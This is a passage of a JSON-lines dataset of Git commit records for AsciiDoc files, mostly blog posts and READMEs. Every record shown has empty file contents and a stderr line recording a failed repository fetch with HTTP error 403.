insert.\n","repos":"DavideD\/hibernate-ogm,schernolyas\/hibernate-ogm,gunnarmorling\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,hibernate\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm,mp911de\/hibernate-ogm,Sanne\/hibernate-ogm,mp911de\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,DavideD\/hibernate-ogm-cassandra,DavideD\/hibernate-ogm-contrib,mp911de\/hibernate-ogm,gunnarmorling\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm,schernolyas\/hibernate-ogm,gunnarmorling\/hibernate-ogm,hibernate\/hibernate-ogm,schernolyas\/hibernate-ogm,hibernate\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/mongodb.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/mongodb.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"1fa6755c0d8d74cf47d132134089467e4be3eade","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 
2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf092db14f648876ae23a45a61725696752195a0","subject":"Added more troubleshooting","message":"Added more troubleshooting\n","repos":"redhat-helloworld-msa\/helloworld-msa","old_file":"troubleshooting.adoc","new_file":"troubleshooting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-helloworld-msa\/helloworld-msa.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"35e0f65b77939d8e890ab5c1bda249cc7a547fd7","subject":"Fixed deploy process","message":"Fixed deploy process\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f9c0300e2c7977bef817f91ad620869bd2d94101","subject":"Add README","message":"Add README\n","repos":"DMBuce\/pacrepo","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DMBuce\/pacrepo.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"47058d86cbd3da0deabb82dcdfbb1016cd62bfd1","subject":"Update 2018-03-03-Building-Web-Component-based-Progressive-Web-App-in-Stencil-JS-Part-01.adoc","message":"Update 2018-03-03-Building-Web-Component-based-Progressive-Web-App-in-Stencil-JS-Part-01.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2018-03-03-Building-Web-Component-based-Progressive-Web-App-in-Stencil-JS-Part-01.adoc","new_file":"_posts\/2018-03-03-Building-Web-Component-based-Progressive-Web-App-in-Stencil-JS-Part-01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed588f223c51de3565ecd5c1ea88ed2b480919da","subject":"Update 2015-09-15-HubPress.adoc","message":"Update 2015-09-15-HubPress.adoc","repos":"hami-jp\/hami-jp.github.io,hami-jp\/hami-jp.github.io,hami-jp\/hami-jp.github.io","old_file":"_posts\/2015-09-15-HubPress.adoc","new_file":"_posts\/2015-09-15-HubPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hami-jp\/hami-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"c0a1d51229e454358d9c895b45bebad3cc9418fd","subject":"Update 2015-09-16-material.adoc","message":"Update 2015-09-16-material.adoc","repos":"harichen\/harichen.io,harichen\/harichen.io,harichen\/harichen.io","old_file":"_posts\/2015-09-16-material.adoc","new_file":"_posts\/2015-09-16-material.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harichen\/harichen.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f6be6e6a80f70ff0542fa5ab283dc5198a77474","subject":"Update 2016-08-08-New-blog.adoc","message":"Update 2016-08-08-New-blog.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-08-New-blog.adoc","new_file":"_posts\/2016-08-08-New-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38862a1a8ac3573480fe108bc61912862949ef9c","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/09\/09\/deref.adoc","new_file":"content\/news\/2022\/09\/09\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a041568c4e303b383240601ae5067f8613ca3a3c","subject":"add a readme","message":"add a readme\n","repos":"devnull-tools\/boteco,devnull-tools\/boteco","old_file":"plugins\/boteco-plugin-redhat\/README.adoc","new_file":"plugins\/boteco-plugin-redhat\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devnull-tools\/boteco.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bfc319abe01a9f2c499f1e6612befa840638dfd2","subject":"List format","message":"List format\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Style.adoc","new_file":"Best practices\/Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e311cd7b5422ef274e12c1a0ec067acdf49827c","subject":"typo fix","message":"typo fix\n\nHortonworks PHD to 
HDP","repos":"spring-projects\/spring-xd-samples,huunhancit\/spring-xd-samples,constantlearner\/spring-xd,rajkumargithub\/spring-xd-samples,rajkumargithub\/spring-xd-samples,huunhancit\/spring-xd-samples,rajkumargithub\/spring-xd-samples,morfeo8marc\/spring-xd-samples,ghillert\/spring-xd-samples,morfeo8marc\/spring-xd-samples,huunhancit\/spring-xd-samples,constantlearner\/spring-xd,ghillert\/spring-xd-samples,huunhancit\/spring-xd-samples,rajkumargithub\/spring-xd-samples,ghillert\/spring-xd-samples,constantlearner\/spring-xd,viveksd87\/spring-xd-samples,morfeo8marc\/spring-xd-samples,morfeo8marc\/spring-xd-samples,spring-projects\/spring-xd-samples,viveksd87\/spring-xd-samples,ghillert\/spring-xd-samples,viveksd87\/spring-xd-samples,ghillert\/spring-xd-samples,viveksd87\/spring-xd-samples,morfeo8marc\/spring-xd-samples,spring-projects\/spring-xd-samples,spring-projects\/spring-xd-samples,ghillert\/spring-xd-samples,huunhancit\/spring-xd-samples,morfeo8marc\/spring-xd-samples,huunhancit\/spring-xd-samples,constantlearner\/spring-xd,viveksd87\/spring-xd-samples,viveksd87\/spring-xd-samples,rajkumargithub\/spring-xd-samples,rajkumargithub\/spring-xd-samples,constantlearner\/spring-xd,spring-projects\/spring-xd-samples,spring-projects\/spring-xd-samples,constantlearner\/spring-xd","old_file":"hadoop-config\/README.asciidoc","new_file":"hadoop-config\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/constantlearner\/spring-xd.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3b08f1ffa28501af04cce88e457cb62ab63ca6d9","subject":"Publish 2016-10-12.adoc","message":"Publish 2016-10-12.adoc","repos":"pokev25\/pokev25.github.io,pokev25\/pokev25.github.io,pokev25\/pokev25.github.io,pokev25\/pokev25.github.io","old_file":"2016-10-12.adoc","new_file":"2016-10-12.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pokev25\/pokev25.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe5a30a0af0ac2d512c468f8ed9f5b99a54e9979","subject":"Update 2015-12-26-Manejo-Eficiente-del-Tiempo.adoc","message":"Update 2015-12-26-Manejo-Eficiente-del-Tiempo.adoc","repos":"jelitox\/jelitox.github.io,jelitox\/jelitox.github.io,jelitox\/jelitox.github.io","old_file":"_posts\/2015-12-26-Manejo-Eficiente-del-Tiempo.adoc","new_file":"_posts\/2015-12-26-Manejo-Eficiente-del-Tiempo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jelitox\/jelitox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e31efbc7f2e89424ac05d0209fe9a2f4bb0029f7","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bcb882ec8832deb465426079867530b6f9c909c","subject":"Update 
2015-02-24-need-h1-to-save.adoc","message":"Update 2015-02-24-need-h1-to-save.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-need-h1-to-save.adoc","new_file":"_posts\/2015-02-24-need-h1-to-save.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f02733f3f269acbeb29570ecdb32c0b65a84b81","subject":"Update 2017-07-07-release-ml-utils.adoc","message":"Update 2017-07-07-release-ml-utils.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-07-07-release-ml-utils.adoc","new_file":"_posts\/2017-07-07-release-ml-utils.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"914e6dff8bddd93f86dabdb43d6405e1e3827076","subject":"Update 2018-11-08-A-W-S-Azure.adoc","message":"Update 2018-11-08-A-W-S-Azure.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b68361b303ecfb696132fa2c1f56ba3630422cd3","subject":"Alerts autoresolve blog post","message":"Alerts autoresolve blog post\n","repos":"jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,lzoubek\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/08\/25\/hawkular-alerts-autoresolve.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/08\/25\/hawkular-alerts-autoresolve.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7702ef5ef2046d3914bdd4556fc3dcb24a2c754e","subject":"Fixed README","message":"Fixed 
README\n","repos":"rmuhamedgaliev\/MPI-lab2","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/MPI-lab2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"417a53fa3dc3266b534a0a955aafc3e111dd6581","subject":"Update 2017-01-19-Swift-Web-View.adoc","message":"Update 2017-01-19-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a313eec090a880539cb44fb88267493242558b03","subject":"Update 2018-03-12-P-H-Per-Golang.adoc","message":"Update 2018-03-12-P-H-Per-Golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-12-P-H-Per-Golang.adoc","new_file":"_posts\/2018-03-12-P-H-Per-Golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e6826b1ff65058aef2bcbacd66de0b47e7f9520","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f6a924edf95feabb9962f214ddb9943923b6fcb","subject":"README","message":"README\n","repos":"motemen\/lib-src","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/motemen\/lib-src.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"435f5c76395144780b9ef90b01ebeb67965bfd17","subject":"y2b create post Don't Try This At Home...","message":"y2b create post Don't Try This At Home...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-07-Dont-Try-This-At-Home.adoc","new_file":"_posts\/2016-06-07-Dont-Try-This-At-Home.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d90aecd9bd82ada4e76410954fd4d5b4c400ee9","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/10\/14\/deref.adoc","new_file":"content\/news\/2021\/10\/14\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"0e3a2dade823e54c8b5618d9dfc7d7dbe41ed58b","subject":"Update 2015-01-31-H24.adoc","message":"Update 2015-01-31-H24.adoc","repos":"simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon","old_file":"_posts\/2015-01-31-H24.adoc","new_file":"_posts\/2015-01-31-H24.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simonturesson\/hubpresstestsimon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba8b06d8b60725288bc739e4889623ce74f2c58f","subject":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","message":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40a8ffc3da82d3969946865465436f84adcd56b1","subject":"small update","message":"small update\n","repos":"apiman\/apiman,apiman\/apiman,msavy\/apiman,msavy\/apiman-guides,apiman\/apiman,msavy\/apiman,apiman\/apiman,apiman\/apiman-guides,msavy\/apiman,msavy\/apiman,ssogabe\/apiman-guides,msavy\/apiman,apiman\/apiman","old_file":"developer-guide\/en-US\/Plugins.asciidoc","new_file":"developer-guide\/en-US\/Plugins.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apiman\/apiman-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4367955f3060100d68f3a418615cfaa719dc51c4","subject":"Update 2017-01-28-Markov.adoc","message":"Update 2017-01-28-Markov.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-01-28-Markov.adoc","new_file":"_posts\/2017-01-28-Markov.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"789c723bdfc7d303c395f3f55986a889eb4b91fe","subject":"Update 2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","message":"Update 2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","new_file":"_posts\/2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4cd9e6792b6e634020d37b9ff3b838f503e18954","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 
2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07a8e8f6d10c7d1d53163aae17604d85cd4d0939","subject":"Update 2016-12-02-exhibition-booth-tour.adoc","message":"Update 2016-12-02-exhibition-booth-tour.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e7c6102007f587a19f60e219d21355cbbd82c9c","subject":"Update 2019-01-18-Laravel-Pusher-Pushjs.adoc","message":"Update 2019-01-18-Laravel-Pusher-Pushjs.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-18-Laravel-Pusher-Pushjs.adoc","new_file":"_posts\/2019-01-18-Laravel-Pusher-Pushjs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69904ee8aa58b1108c809656ed34797a2eee0dd6","subject":"Explain that IDEA import honors IDEA configuration","message":"Explain that IDEA import honors IDEA configuration\n\nClarify that IDEA's import facility doesn't require the build script to apply\nthe IDEA Plugin, but it will honor some forms of IDEA configuration if it does.\n","repos":"lsmaira\/gradle,gradle\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,robinverduijn\/gradle,gradle\/gradle,lsmaira\/gradle,lsmaira\/gradle,lsmaira\/gradle,gradle\/gradle,robinverduijn\/gradle,blindpirate\/gradle,gradle\/gradle,lsmaira\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,lsmaira\/gradle,robinverduijn\/gradle,lsmaira\/gradle,robinverduijn\/gradle,gradle\/gradle,gradle\/gradle,lsmaira\/gradle,lsmaira\/gradle,blindpirate\/gradle,gradle\/gradle,lsmaira\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,blindpirate\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/ideaPlugin.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/ideaPlugin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/robinverduijn\/gradle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5100d7d57a1fa73da3b4fddfe1984a30cf725014","subject":"Update 2015-09-29-Versionering-van-Cobra-voor-Fun-en-Profit.adoc","message":"Update 
2015-09-29-Versionering-van-Cobra-voor-Fun-en-Profit.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-09-29-Versionering-van-Cobra-voor-Fun-en-Profit.adoc","new_file":"_posts\/2015-09-29-Versionering-van-Cobra-voor-Fun-en-Profit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c300ed4bba4732df53adb67931a5538ed167beb","subject":"y2b create post World's Biggest Android Phone!","message":"y2b create post World's Biggest Android Phone!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-08-Worlds-Biggest-Android-Phone.adoc","new_file":"_posts\/2016-08-08-Worlds-Biggest-Android-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5258fb5ab9f331e164d992798b3f96eceda9413","subject":"Update 2016-08-27-Bretonio-Groks-Project-Pages.adoc","message":"Update 2016-08-27-Bretonio-Groks-Project-Pages.adoc","repos":"bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io","old_file":"_posts\/2016-08-27-Bretonio-Groks-Project-Pages.adoc","new_file":"_posts\/2016-08-27-Bretonio-Groks-Project-Pages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bretonio\/bretonio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44eee02fabcfb708b06c2222ad708ffc3a33d471","subject":"Update 2016-08-31-Prueba-de-post-n3.adoc","message":"Update 2016-08-31-Prueba-de-post-n3.adoc","repos":"mager19\/mager19.github.io,mager19\/mager19.github.io,mager19\/mager19.github.io,mager19\/mager19.github.io","old_file":"_posts\/2016-08-31-Prueba-de-post-n3.adoc","new_file":"_posts\/2016-08-31-Prueba-de-post-n3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mager19\/mager19.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"583d059c0bfc79ca28e523dcca83d1e5d0470979","subject":"Update 2016-06-01-Dapeng-VR-Crisis.adoc","message":"Update 2016-06-01-Dapeng-VR-Crisis.adoc","repos":"blackgun\/blackgun.github.io,blackgun\/blackgun.github.io,blackgun\/blackgun.github.io","old_file":"_posts\/2016-06-01-Dapeng-VR-Crisis.adoc","new_file":"_posts\/2016-06-01-Dapeng-VR-Crisis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blackgun\/blackgun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0f549fbbe6fbc73db4a8782a31d4352c57d612d","subject":"Update 2017-03-15-What-init-system-am-I-using-Something-test.adoc","message":"Update 
2017-03-15-What-init-system-am-I-using-Something-test.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-03-15-What-init-system-am-I-using-Something-test.adoc","new_file":"_posts\/2017-03-15-What-init-system-am-I-using-Something-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"785e143b7e82479f66d8a90a6ef12fc187d00888","subject":"Update 2016-04-16-Certificacion-java.adoc","message":"Update 2016-04-16-Certificacion-java.adoc","repos":"crimarde\/crimarde.github.io,crimarde\/crimarde.github.io,crimarde\/crimarde.github.io,crimarde\/crimarde.github.io","old_file":"_posts\/2016-04-16-Certificacion-java.adoc","new_file":"_posts\/2016-04-16-Certificacion-java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crimarde\/crimarde.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1fca0ce2533a4272304ec1614db6a676ac9518d6","subject":"Update 2017-03-31-Google-Apps-Script.adoc","message":"Update 